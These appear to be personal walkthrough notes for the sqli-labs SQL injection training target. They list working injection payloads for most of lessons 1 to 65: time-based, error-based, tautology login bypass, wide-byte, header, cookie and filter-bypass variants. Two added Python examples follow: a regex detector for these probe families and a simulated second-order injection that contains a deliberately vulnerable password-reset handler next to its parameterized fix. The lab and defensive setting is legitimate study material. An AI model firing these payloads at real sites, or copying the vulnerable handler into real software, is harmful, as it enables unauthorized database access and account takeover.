sqli-labs target test notes
Summary:
This lab is designed with many scenarios, but in my own testing I did not follow its planned path; I only verified that a vulnerability exists. My feeling after finishing it is that it is very tiring: many of the challenges are simple substitutions of a single quote, a double quote, a double quote plus a parenthesis and the like, pure grunt work.
The challenges I personally consider worth doing are 24, 26, 27, 32 and 34, and that is all.
One thing to note: POST-based wide-byte injection has to be edited in Burp Suite; with HackBar, %df gets URL-encoded and the injection fails.
For setting up the target, vulstudy is recommended: one-click deployment.
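The payloads listed below fall into a handful of families: time-based (sleep), error-based (extractvalue), boolean tautologies (or 1=1, |'1=1), union with a space substitute, a wide-byte %df prefix before the quote, and comment terminators. As an added example that is not part of these notes, the Python classifier below tags raw request lines with those families the way a detection engineer would run it over access logs. The sample request lines are constructed here from the payload shapes on the page (lab paths kept, host omitted). It also demonstrates the HackBar point above: a double-encoded %25df decodes to the literal text "%df", not to the 0xDF byte, so no wide character is formed and the wide-byte rule stays silent.

```python
"""Classify SQLi probe families in raw request lines (added example, not from
the original notes). Matching is done on URL-decoded *bytes* so that %df and
%a0 are seen as the single bytes 0xDF / 0xA0, exactly as the server sees them."""
import re
from urllib.parse import unquote_to_bytes

# Constructed sample request lines, shaped after the payloads in these notes.
SAMPLE_REQUESTS = [
    "GET /Less-8/index.php?id=3'%20and%20sleep(6)%23",
    "GET /Less-5/index.php?id=1'%20and%20extractvalue(1,concat(0x5c,(select%20user())))%23",
    "POST /Less-34/index.php uname=1%df%27%20and%20extractvalue(1,concat(0x5c,(select%20user())))%23&passwd=Dumb",
    # Same request as HackBar would send it: %df has been URL-encoded a second time.
    "POST /Less-34/index.php uname=1%25df%27%20and%20sleep(5)%23&passwd=Dumb",
    "GET /Less-26/index.php?id=1'||extractvalue(1,concat(0x5c,user()))|%271=1",
    "GET /Less-28/index.php?id=a')union%a0select(database()),(user()),(%273",
    "POST /Less-42/login.php login_user=admin&login_password=1'or+1=1%23&mysubmit=Login",
    "GET /Less-1/index.php?id=3",  # benign
]

# Signatures per probe family; each is a bytes regex applied after decoding.
RULES = [
    ("time_based", re.compile(rb"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("error_based", re.compile(rb"\b(?:extractvalue|updatexml)\s*\(", re.I)),
    # Tautologies joined by OR, || or a single | (Less-26 uses | as the separator).
    ("boolean", re.compile(rb"(?:\bor\b|\|\|?)\s*\(?\s*['\"]?1['\"]?\s*=\s*['\"]?1", re.I)),
    # union<sep>select where <sep> may be a space substitute such as 0xA0 or /**/.
    ("union", re.compile(rb"\bunion[\s\xa0/*(]*select\b", re.I)),
    ("comment_term", re.compile(rb"#|--\s|/\*")),
    # A GBK lead byte (0x81-0xFE) directly before a quote: the wide-byte trick.
    ("wide_byte_prefix", re.compile(rb"[\x81-\xfe]['\"]")),
    # Space substitutes from the bypass list in lesson 26.
    ("space_bypass", re.compile(rb"[\x09\x0a\x0b\x0c\x0d\xa0\x00]|/\*\*/")),
]


def classify(request_line: str) -> set:
    """Return the set of probe-family labels found in one raw request line."""
    # '+' is a form-encoded space; decode to bytes so high bytes survive intact.
    decoded = unquote_to_bytes(request_line.replace("+", " "))
    return {name for name, rx in RULES if rx.search(decoded)}


def scan(lines) -> dict:
    """Map each request line to its labels, keeping only lines that matched."""
    result = {}
    for line in lines:
        labels = classify(line)
        if labels:
            result[line] = labels
    return result


if __name__ == "__main__":
    for line, labels in scan(SAMPLE_REQUESTS).items():
        print(sorted(labels), line)
```

The wide-byte rule is the noisiest of the set: any UTF-8 multibyte character followed by a quote in legitimate input also has a high byte before the quote, so on real traffic it should be correlated with the other families rather than alerted on alone. The classifier only recognises the spellings this lab uses; the fix on the server side is parameterized queries plus a correctly declared connection charset, not a longer regex list.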
1 http://10.150.10.186/Less-1/index.php?id=3' and sleep(3)%23
2 http://10.150.10.186/Less-2/index.php?id=3 and sleep(3)%23
3 http://10.150.10.186/Less-3/index.php?id=3')%20and%20sleep(3)%23
4 http://10.150.10.186/Less-4/index.php?id=3")%20and%20sleep(3)%23
5 http://10.150.10.186/Less-5/index.php?id=3' and sleep(3)%23
6 http://10.150.10.186/Less-6/index.php?id=3" and sleep(3)%23
7 http://10.150.10.186/Less-7/index.php?id=3'))%20and%20sleep(3)%23
8 http://10.150.10.186/Less-8/index.php?id=3' and sleep(6)%23
9 http://10.150.10.186/Less-9/index.php?id=3' and sleep(6)%23
10 http://10.150.10.186/Less-10/index.php?id=3" and sleep(6)%23
11 Username:admin'# Password:xx
12 admin")# xx
13 admin 1') or ('1=1
14 admin x" or "1=1
15 admin x' or '1=1
16 admin x") or ("1=1
17 admin x' and extractvalue(1,concat(0x5c,(select user())))#
18 Dumb Dumb and set the User-Agent to x',1,extractvalue(1,concat(0x5c,(select user()))))#
19 Dumb Dumb and set the Referer to x',1,extractvalue(1,concat(0x5c,(select user()))))#
20 Dumb Dumb and set the cookie to uname=x' and extractvalue(1,concat(0x5c,(select user())))#
21 Dumb Dumb and set the cookie to uname=eCcpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg1Yywoc2VsZWN0IHVzZXIoKSkpKSM=
22 Dumb Dumb and set the cookie to uname=eCIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDVjLChzZWxlY3QgdXNlcigpKSkpIw==
24 Tests second-order injection: register a new user with the username admin' or 1=1# and then reset the password to anything.
25 http://192.168.61.242/Less-25/index.php?id=1' aAndnd extractvalue(1,concat(0x5c,(select user())))%23
26 The hardest part is that spaces and comment characters are filtered. Space-bypass options: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /!/ tab ()
http://192.168.61.242/Less-26/index.php?id=1'||extractvalue(1,concat(0x5c,user()))|%271=1
28 http://192.168.61.242/Less-28/index.php?id=a')union%a0select(database()),(user()),(%273
29 http://192.168.2.105/Less-29/index.php?id=x' and extractvalue(1,concat(0x5c,(select user()),1))%23
30 http://192.168.2.105/Less-30/index.php?id=1" and sleep(5)%23
31 http://192.168.2.105/Less-31/index.php?id=1") and extractvalue(1,concat(0x5c,(select user())))%23
32 http://192.168.61.242/Less-32/index.php?id=1%df' and extractvalue(1,concat(0x5c,(select user())))%23
33 http://192.168.61.242/Less-33/index.php?id=1%df' and extractvalue(1,concat(0x5c,(select user())))%23
34 uname=1%df%27%20and%20extractvalue(1,concat(0x5c,(select user())))%23&passwd=Dumb&submit=Submit
Note: this must be edited in Burp Suite; editing it in HackBar does not work.
35 http://192.168.2.105/Less-35/index.php?id=1 and sleep(5)%23
36 http://192.168.2.105/Less-36/index.php?id=1%df\' and ascii(substr(database(),sleep(5),1))>97%23
37 post:uname=1%df%27%20and%20extractvalue(1,concat(0x5c,(select user())))%23&passwd=x&submit=Submit
38 http://192.168.2.105/Less-38/index.php?id=1' and ascii(substr(database(),sleep(5),1))%3E97%23
39 http://192.168.2.105/Less-39/index.php?id=1 and ascii(substr(database(),sleep(5),1))%3E97%23
40 http://192.168.2.105/Less-40/index.php?id=1')%20and%20ascii(substr(database(),sleep(5),1))%3E97%23
41 http://192.168.2.105/Less-41/index.php?id=1 and ascii(substr(database(),sleep(5),1))%3E97%23
42 POST to login.php: login_user=admin&login_password=1'or+1=1%23&mysubmit=Login
43 POST to login.php: login_user=admin&login_password=1')or+1=1%23&mysubmit=Login
44 POST to login.php: login_user=admin&login_password=1'or+1=1%23&mysubmit=Login
45 POST to login.php: login_user=admin&login_password=1')or+1=1%23&mysubmit=Login
46 http://192.168.2.105/Less-46/index.php?sort=1 and extractvalue(1,concat(0x5c,(select user())))
47 http://192.168.2.105/Less-47/index.php?sort=1' and extractvalue(1,concat(0x5c,(select user())))%23
48 http://192.168.2.105/Less-48/index.php?sort=1 and ascii(substr(database(),sleep(5),1))%3E97%23
49 http://192.168.2.105/Less-49/index.php?sort=1' and ascii(substr(database(),sleep(5),1))%3E97%23
50 http://192.168.2.105/Less-50/index.php?sort=1 and ascii(substr(database(),sleep(5),1))%3E97%23
51 http://192.168.2.105/Less-51/index.php?sort=1' and ascii(substr(database(),sleep(5),1))%3E97%23
52 http://192.168.2.105/Less-52/index.php?sort=1 and ascii(substr(database(),sleep(5),1))%3E97%23
53 http://192.168.2.105/Less-53/index.php?sort=1' and ascii(substr(database(),sleep(5),1))%3E97%23
54 http://192.168.2.105/Less-54/index.php?id=1' and ascii(substr(database(),sleep(5),1))%3E97%23
55 http://192.168.2.105/Less-55/index.php?id=1)%20and%20ascii(substr(database(),sleep(5),1))%3E97%23
56 http://192.168.2.105/Less-56/index.php?id=1')%20and%20ascii(substr(database(),sleep(5),1))%3E97%23
57 http://192.168.2.105/Less-57/index.php?id=1" and ascii(substr(database(),sleep(5),1))%3E97%23
58 http://192.168.2.105/Less-58/index.php?id=1' and ascii(substr(database(),sleep(5),1))%3E97%23
59 http://192.168.2.105/Less-59/index.php?id=1 and ascii(substr(database(),sleep(5),1))%3E97%23
60 http://192.168.2.105/Less-60/index.php?id=1")%20and%20ascii(substr(database(),sleep(5),1))%3E97%23
61 http://192.168.2.105/Less-61/index.php?id=1'))%20and%20ascii(substr(database(),sleep(5),1))%3E97%23
62 http://192.168.2.105/Less-62/index.php?id=1')%20and%20ascii(substr(database(),sleep(5),1))%3E97%23
63 http://192.168.2.105/Less-63/index.php?id=1' and ascii(substr(database(),sleep(5),1))%3E97%23
64 http://192.168.2.105/Less-64/index.php?id=1))%20and%20ascii(substr(database(),sleep(5),1))%3E97%23
65 http://192.168.2.105/Less-65/index.php?id=1")%20and%20ascii(substr(database(),sleep(5),1))%3E97%23
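Lesson 24 above is the one second-order case in the list: registration stores the quoted username safely, and the later password reset reads that stored username back and trusts it. The following Python simulation, an added example that is not part of these notes or of sqli-labs, reproduces that pattern on an in-memory SQLite database with the vulnerable reset beside the parameterized fix. Because SQLite has no MySQL-style # comment, the constructed attacker username uses the SQL-standard "-- " terminator instead of the page's #; the table, the "admin" and "Dumb" rows and the function names are all assumptions made for this demo.

```python
"""Second-order injection on a toy users table (added example, not lab code).
The point: escaping or parameterizing at the *entry* query is not enough if a
later query rebuilds SQL from a value that came out of the database."""
import sqlite3

# Constructed attacker username; '-- ' replaces the page's '#' because this
# simulation runs on SQLite, where '#' is not a comment.
ATTACKER_USERNAME = "admin' or 1=1-- "


def make_db() -> sqlite3.Connection:
    """Assumed schema and seed rows for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("Dumb", "Dumb")])
    return conn


def register(conn, username, password):
    """Registration is parameterized: the quote is stored literally, nothing breaks."""
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def sql_quote(value: str) -> str:
    """Naive escaping applied only to *fresh* input, mirroring the lab's pattern."""
    return value.replace("'", "''")


def reset_password_vulnerable(conn, session_username, new_password):
    """The defect: the username comes from the database (via the session) and is
    concatenated into SQL as if it were trusted, while only the new password
    is escaped."""
    row = conn.execute("SELECT username FROM users WHERE username = ?",
                       (session_username,)).fetchone()
    stored_username = row[0]
    sql = (f"UPDATE users SET password='{sql_quote(new_password)}' "
           f"WHERE username='{stored_username}'")
    # With the attacker row this becomes:
    #   ... WHERE username='admin' or 1=1-- '
    # so every row is updated.
    conn.execute(sql)


def reset_password_safe(conn, session_username, new_password):
    """The fix: bind both values; origin of the data makes no difference."""
    conn.execute("UPDATE users SET password = ? WHERE username = ?",
                 (new_password, session_username))


def passwords(conn) -> dict:
    return dict(conn.execute("SELECT username, password FROM users"))


def demo(vulnerable: bool) -> dict:
    """Register the attacker, run a reset through one of the two handlers and
    return the resulting username -> password map."""
    conn = make_db()
    register(conn, ATTACKER_USERNAME, "x")
    if vulnerable:
        reset_password_vulnerable(conn, ATTACKER_USERNAME, "pwned")
    else:
        reset_password_safe(conn, ATTACKER_USERNAME, "pwned")
    return passwords(conn)


if __name__ == "__main__":
    print("vulnerable:", demo(True))
    print("safe:      ", demo(False))
```

With the vulnerable handler every account, including admin, ends up with the attacker's password; with the parameterized handler only the attacker's own row changes. Input validation on the registration form would not have helped here, since the registration query was already correct: the defect is entirely in the second query.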